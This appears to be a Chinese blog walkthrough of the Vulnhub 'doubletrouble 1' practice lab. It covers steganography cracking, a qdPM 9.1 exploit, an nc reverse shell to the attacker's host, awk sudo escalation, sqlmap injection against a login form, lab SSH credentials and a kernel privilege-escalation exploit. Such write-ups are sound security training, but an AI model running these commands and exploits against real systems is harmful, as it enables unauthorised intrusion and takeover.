doubletrouble1靶场详解

最新推荐文章于 2024-08-15 20:29:14 发布
最新推荐文章于 2024-08-15 20:29:14 发布
阅读量172 收藏 1
点赞数
分类专栏: 打靶机系列 文章标签: linux web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681307/article/details/131686513
版权

doubletrouble1靶场复盘

首先扫描到ip后对ip单独一个全面扫描。

nmap -sP 192.168.102.0/24

image-20230712165724900

同时扫描一下目录,扫到一个secret,打开看一下。

dirsearch -u http://192.168.102.165

image-20230712165415876

发现里面是一个图片,下载到我们kali 中去,因为都说了是秘密,所以这个图片肯定有点问题。

用binwalk没有发现里面有啥东西

wget http://192.168.102.165/secret/doubletrouble.jpg

image-20230712144250825

但是steghide发现里面隐写了东西,因为需要输入密码,所以里面肯定是有东西的。

image-20230712144336873

我们可以直接利用kali自带的这个工具爆破一下,但是太慢了

stegcracker 图片地址 字典地址

dpkg -i stegseek_0.6-1.deb

在github上找到一个工具叫做stegseek说是全世界最快的爆破工具,下载到kali中安装一下。

stegseek 图片地址 字典地址

image-20230712145225399

一瞬间就跑出来密码了。

image-20230712145537599

我们解密一下发现里面是一个txt,txt中是一个邮箱和密码。

image-20230712145747824

我们的主页面但是我们发现是用的一个qdPM 9.1的CMS。

image-20230712150204367

搜索了一下发现果真有这个的漏洞。

image-20230712150804489

下载到kali中运行发现需要三个参数,地址,邮箱和密码,我们刚好利用刚才找到的用户名密码。

image-20230712150741022

直接往里面注入了一个cmd,我们可以直接做一个反弹shell

nc -e /bin/bash 192.168.102.129 8888

image-20230712151301917

image-20230712151520902

image-20230712151530676

拿到shell以后sudo -l发现简直白送,我们awk提权直接拿到root

image-20230712151746642

本来以为直接结束了,看看flag吧,但是没想到还有一个ova

image-20230712152842393

我们拷贝出来,然后安装到虚拟机。

scp root@192.168.102.165:/root/doubletrouble.ova /root

image-20230712152949408

安装好后我也没扫描ip,刚才的ip是165,这个肯定是166.

发现有一个登陆页面,用bp抓包看看,发现是post请求。

image-20230712153615912

把抓到的内容复制到一个空文档中去,用sqlmap跑一下,这里面的内容不能修改,空行也不可以删除,会出错。

发现是有数据库的。

POST /index.php HTTP/1.1
Host: 192.168.102.166
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: http://192.168.102.166
Connection: close
Referer: http://192.168.102.166/
Upgrade-Insecure-Requests: 1

uname=1&psw=1&btnLogin=Login

image-20230712154236481

再查找一下数据库中的表,发现一个users表。

image-20230712154427066

显示出里面的列,一个username和password两个属性。

image-20230712154737571

我们查看一下里面的内容,发现有两个用户。

image-20230712155318111

尝试了一下clapton用户可以ssh登陆。

user:clapton    pass:ZubZub99

以前见过exim4提权,但是发现在这里行不通,就查看了一下内核。

image-20230712155658312

image-20230712162645849

搜索了一下有没有漏洞,结果发现一大堆漏洞,直接内核提权,我下载的是40616.c这个。

searchsploit linux 3.2

image-20230712163704366

下载到我们靶机中去。

image-20230712163906873

加个权限,然后gcc编译一下,执行就root了

image-20230712164928224

dumplings。
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【Vulnhub靶场DOUBLETROUBLE: 1 通关writeup
weixin_44588899的博客
05-20 964
环境 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:192.168.220.128 靶机 ip: 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.220.130 开始探测 nmap -T4 -p- -A 192.168.220.130 发现开放22、80端口, 打开http://192.168.220.130 /,是一个登录框,没什么有价值的东西,直接扫目录吧。 dirb http:
DoubleTrouble:Bootcamp Innopolis项目2015
05-20
1. `src`目录:存放所有Java源代码,按照包结构组织。 2. `resources`目录:存储非代码资源,如配置文件、图片等。 3. `build.gradle`或`pom.xml`:构建文件,用于自动化构建和依赖管理,前者对应Gradle,后者对应...
vulnhub-doubletrouble靶场
leo788的博客
02-18 592
这个靶场可以学到很多方法:1.使用stegseek工具对于隐写术的密码进行爆破;2.通过searchsploit查找开源CMS对应版本漏洞进行漏洞利用;3.使用sqlmap进行sql注入盲注;4.脏牛提权>FObins提权。
vulnhub靶场-DoubleTrouble
qq_42947816的博客
07-12 1205
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
vulnhub靶场doubletrouble
qq_58091216的博客
02-19 844
我们看到是一个登录页面,一般登录页面要么爆破,要么进行测试SQL注入,这个只能进行SQL注入。虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.1.0/24。我们进行查看40616.c内容, 先使用gcc连接,然后直接使用,后面不用跟其他命令。我们使用msf查找漏洞,查找到一个漏洞,但是需要密码,这个办法行不通。我们进入root查看,发现没有flag,有一个镜像,我们下载下来。我们使用kali进行查找漏洞,但是漏洞需要密码,还是不行。
CTF学习-Vulnhub 靶场DOUBLETROUBLE
dengpan119的博客
03-28 3863
Vulnhub 靶场DOUBLETROUBLE 提示:IP地址用的是复制内网IP,建议是设置自己虚拟网络C段地址。 前言 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:172.X.X.176 windows10攻击机IP:172.X.X.189 靶机 ip:172.X.X.186-187 工具:VMware Workstation Pro/Oracle VM VirtualBox 提示:以下是本篇文章正文内容,下面案例可
doubletrouble:html5 w vim快捷方式中的两人游戏
05-26
双重麻烦 带有html5 w / vim快捷键的... 要开始玩,请抓住一个朋友并前往 如果您有兴趣帮助: git clone https://github.com/jonathanballs/doubletrouble.git cd doubletrouble npm install . 启动服务器 node .
DoubleTrouble 靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
01-08 214
DoubleTrouble 靶场渗透记录 玩盗梦空间是吧~打破“梦境”的不是陀螺,是sqlmap
Vulnhub靶机:doubletrouble
qq_48904485的博客
01-06 1041
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:doubletrouble(10.0.2.7)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/doubletrouble-1,743/
隐写工具Steghide使用教程(win)
热门推荐
Amherstieae的博客
05-16 1万+
害,菜鸡今天又来写博客了 前面先来说点废话 今天在buu刷题遇到了这个工具,网上很多师傅的博客讲的都是Linux下的安装使用教程,现在记录一下我在win下学习过程纪录在此(o(╥﹏╥)o一把辛酸泪) 0x01先来扯两句Kali的 Kali安装命令 apt-get install steghide 使用命令 将隐藏信息从载体中分离出来 steghide extract -sf test.jpg -p 123456 #-sf 参数 #test.jpg 图片名称 #-p 密码参数,后面空格跟密码,无密码可不
stegseek:世界上最快的Steghide饼干,每秒可读取数百万个密码
03-31
:high_voltage: Stegseek Stegseek是一种快如闪电的Steghide饼干,可用于从文件中提取隐藏数据。 它是作为原始steghide项目的一个分支而构建的,因此,它比其他饼干要快数千倍,并且可以在2秒钟内遍历整个rockyou.txt *。 Stegseek还可以用于在没有密码的情况下提取steghide元数据,该密码可以用于测试文件是否包含steghide数据。 * rockyou.txt是一个著名的密码列表,其中包含超过1400万个密码。 演示:随机的rockyou.txt密码(实时) 跳至“以获取一些原始数据。 :wrench: 安装 以下说明将引导您完成安装过程。 或者,您可以在Docker容器中运行Stegseek。 跳至以获取说明。 发行版 Linux 在Ubuntu和其他基于Debian的系统上,可以使用提供的.deb软件包进行安装: 下载最新的 使用sudo apt in
Dr4g0n-b4ll靶机总结
qq_45301512的博客
01-29 479
靶机下载地址:打开靶机,使用nmap扫描靶机的ip和所有开放的端口可以看到靶机开放了80端口和22端口根据80端口打开网站信息收集,目录爆破在robots.txt下发现一串base64编码解码之后,显示你发现了隐藏的目录,但是这个隐藏的目录还不知道在哪这里要么得需要字典好,能够跑出来要么就可能作者给出提示然后通过查看源代码,发现在源代码的最下面,有一行base64编码经过三次解码之后获得了DRAGON BALL这个东西很有可能就是隐藏目录。
doubletrouble靶机通关详解
arcuied
08-10 308
doubletrouble靶机通关详解
vulnhub之doubletrouble(版本一)
m0_67427205的博客
12-19 76
对扫描的目录逐一进行访问,有很多有意思的东西,但是站在出题者的角度,我觉得这道题最重要的可能是/secret目录,尝试访问,得到了一张图片。在kali中开启监听,点击shell.php运行,即可发送shell至kali,查看自己的权限,并利用python获取交互式shell。然后只需要将其上传即可,刚刚目录扫描中还有一个/uploads目录,访问该目录,点击users即可找到刚才上传的文件。很简陋的表单,尝试用刚才获取的用户名和密码登录失败,该表单如此简陋,不会有sql注入吧,sqlmap简单跑一跑。
DOUBLETROUBLE: 1实战演练
龙狼刺的博客
05-24 730
DOUBLETROUBLE 1
vulnhub靶机_DOUBLETROUBLE: 1
学术渣渣的博客
09-14 3274
文章目录靶机介绍渗透过程获取ip端口扫描网站目录扫描图片隐写数据提取登录网站qdPM漏洞利用提权 靶机介绍 下载地址:http://www.vulnhub.com/entry/doubletrouble-1,743/ 难度:简单 描述:get flags 渗透过程 获取ip 靶机IP为192.168.1.113。 arp-scan -l 端口扫描 nmap -A -T4 -p 1-65535 192.168.1.113 靶机开放了22和80端口。 网站目录扫描 首先对网站的特殊文件进行扫描。 dir
Linux 定时任务
flash的博客
08-14 407
Linux系统中,cron是一个广泛使用的定时任务工具,允许用户安排周期性执行的任务(脚本或命令)。cron守护进程(crond)会读取配置文件(通常位于/etc/crontab),并根据这些配置文件中指定的时间规则来执行相应的任务。
linux:有关目录、链接文件的函数 Makefil、gdb的使用
最新发布
T66656的博客
08-15 1023
功能:根据用户id到/etc/passwd文件下解析获得结构体信息参数:uid:用户id返回值:成功返回id对应用户的信息失败返回NULLpasswd结构体的定义通常如下所示。
linux开启RNDIS,实现虚拟网卡
轩辕霸天L
08-15 494
首先要 `make clean`,清空之前的编译结果。
doubletrouble靶机
08-29
- *1* [vulnhub靶场-DoubleTrouble](https://blog.csdn.net/qq_42947816/article/details/125739402)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值